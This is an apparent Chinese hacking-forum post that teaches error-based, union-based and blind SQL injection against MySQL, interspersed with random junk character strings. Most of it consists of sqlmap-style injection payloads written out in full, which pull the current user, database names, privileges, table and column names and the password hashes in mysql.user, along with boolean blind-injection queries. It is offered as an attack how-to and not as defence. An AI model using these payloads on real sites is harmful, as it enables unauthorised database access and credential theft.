放假第一天,本应该好好放松一下,可是还是想着把文章写完先。。。
2 x P) |4 Q! b " {2 R, L6 V* M0 E
这次的主题是高级注入,坛子里也讲到了一些,不过本文旨在给大家一个更深刻的概念和全面的理解,下面看看我自己列的一个表2 t' ^4 x1 a( v3 N4 d' W: M5 E! Y
9 q$ T% L& m8 T8 Q! Q分类标准 分类 备注
# L+ L2 ]6 _/ L% t) T( R按字段类型 整型注入,字符型注入 4 g5 }. r. Y. Y3 E7 E
按出现的位置 get注入,post注入,cookie注入,http header注入 5 E! S6 X2 a4 u$ z. C
然而高级注入是这样的
9 N' e6 X. t& A( |, ?* f
' _( ?) c" @6 q E! ], e/ {5 }* E高级注入分类 条件7 i( Z% y. o6 h- Q
error-based sql 数据库的错误回显可以返回,存在数据库,表结构 @: o$ y$ ?' j/ n5 h8 u% h" o/ [9 S
union-based sql 能够使用union,存在数据库,表结构# N2 _! r& m$ b* r3 B, t0 x' g
blind sql 存在注入
; d R- L% u+ L我们暂且不考虑waf等的影响,只从原理上学习。通过上面我们不难发现,三种高级注入选择的顺序应该是eub(第一个字母,后面为了方便我都这样表示了 ),实际上,e是不需要知道字段数的,u需要知道字段数,e之所以在前我觉得主要是因为这个,因为在其他方面它们没有本质的区别,它们都需要知道数据库以及表的结构,这样才能构造出相应的语句,当然,能e一般能u(没过滤union等),反过来却很不一定,因为一般会有自定义的错误提醒。如果没有结构,那么就回到了最悲剧,最麻烦的b了,猜。。。当然可能没有结果,但是如果只是不能使用u,有结构,b还是能出结果的,只是苦逼点而已。。。1 P! _4 D4 B0 [+ Z/ x
1 L# E9 O. v4 f" x; X; N
好了,说了这么多,该上神器sqlmap了,最近坛子里貌似很火. m6 ]6 r* l3 R6 c- p# d
% K( V8 F, ]# R R. c附件分别以mysql和mssql为例子,提醒:sqlmap中使用-v 3可以查看每个请求的payload。9 [5 l( [- h% O6 n# e7 I$ H1 A
, k% k" r' a5 ^, |$ A* p# B这里用mysql说明5 d5 u# n% q+ m: V4 i) S
$ r8 i# n* ?. F; w3 }/ T
e注入坛子里很多了,请看戳我或者再戳我
+ x$ i- N* |+ g & S4 O# O( g7 `0 N, n
u注入其实也很多了,这里就大概帖上一些重要语句吧,附件上结合例子都有的, U/ v4 z: ~) h
3 B0 {* h7 y5 \
获取当前数据库用户名
: ?6 ~# V# Z @: ?: f# k/ p
, K: \+ j2 J5 p! jUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(C
* q9 Y( }% {7 ^AST(CURRENT_USER() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NUL
# Q, T0 h1 t, c/ ~L, NULL## z4 p+ e4 j' z1 w. I
注意concat那里不是必须的,只是sqlmap为了自动攫取出数据加上的特征,下面语句类似,涉及基础性的知识,基友们自己去补吧。
) X5 E; `9 K8 J5 J
" U8 m2 h1 f' V8 R1 `获取数据库名
; D h) q' [) ~& O- D 8 J" I' m3 [1 o! V: z3 k% B
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(DATABASE() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#
$ v; y [ k" t& k6 ^获取所有用户名
2 s) s- ^7 y5 v
8 e5 i5 }) V5 l1 i3 g1 Q9 ]UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#8 M. f4 G* j2 k5 v* @; `! Q
查看当前用户权限
1 W9 y( \0 g3 M6 o& `# c# N$ N
* I1 B* @6 B* fUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(privilege_type AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#
7 ]. o. t) | \* Z0 J尝试获取密码,当然需要有能读mysql数据库的权限2 k$ K% ]3 `2 Z
; t1 s V J9 Y# l
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(user AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(password AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM mysql.user## B4 S, ]& ?. B7 j7 }" v/ y
获取表名,limit什么的自己搞啦
& t V* b1 q/ I- s
6 R0 k4 S5 v* n8 v( ?9 pUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(table_name AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.TABLES WHERE table_schema = 0x7061727474696d655f6a6f62#1 _* _' X, o$ h& H
获取字段名及其类型& y! p0 T+ c2 r! f0 I
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(column_name AS CHAR),0×20),0x697461626a6e,IFNULL(CAST(column_type AS CHAR),0×20),0x3a6864623a),NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x61646d696e5f7461626c65 AND table_schema=0x7061727474696d655f6a6f62 AND (column_name=0x61646d696e6e616d65 OR column_name=0x70617373776f7264)#
* u$ I) w! E2 M2 d0 {5 z7 X4 `
: {' D' t5 N3 J. z& t: @& z6 Eb注入,呵呵,除了当前用户,数据库,版本可以出来,而如果不能u,但存在数据的结构表,还是能苦逼出来,否则猜也不一定能猜到表和字段,内容自然也出不来,苦逼access啊。。。' `7 |7 K5 d7 P1 @5 Y
5 I2 P }, u. U* h1 p+ U
如:; D9 J' t* p2 E4 }8 @$ N# h
获取当前用户名
" d& Z% s8 @' L2 R- S2 s 1 i, h/ Q9 A3 E Z, S
AND ORD(MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,1)) > 1162 y) `* a6 O% ]" p: d& a' Y G
获取当前数据库
# P2 P% G3 U; e% C9 n$ A
1 r9 w) Q! l3 _AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),6,1)) > 1061 `* y/ D0 O; Q/ N
获取表名
+ J' h0 O) ]9 ^; r+ ~6 T : W: ~) o6 ?8 A2 R( W; p
AND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7061727474696d655f6a6f62),1,1)) > 51
: M1 ?# v! d2 }! u; |- f8 ^" i获取字段名及其类型和爆内容就不说了,改改上面的就可以了。) ?: @4 O6 S' u1 O5 ]8 ~
回到最苦逼的情况,无结构的,mysql版本<5.0,现在不多见了吧,还是看看语句。7 ~3 I6 y+ L" Q; e; k
爆表. r6 A- A9 g# o, z
, C0 C6 s# P' F! Y, rAND EXISTS(select * from table), m7 J% P$ l' d: p' M( m! _
爆字段* B& G3 }) E# g6 f
4 i+ J* [9 M% X6 O
AND EXISTS(select pwd from table)! h7 d- Y q" R K$ i
盲注的变化就比较多了,由于篇幅,只是举个例子而已。
8 a3 s& O0 ]& a2 N' r, Y
9 \# Y+ k1 i% X' f1 D# J本来想把mssql和access都写上的,不过编辑得太累了,有时间再写吧,其实原理都差不多,今天就洗洗睡了吧。0 H5 G i+ \8 M. |7 L1 p
|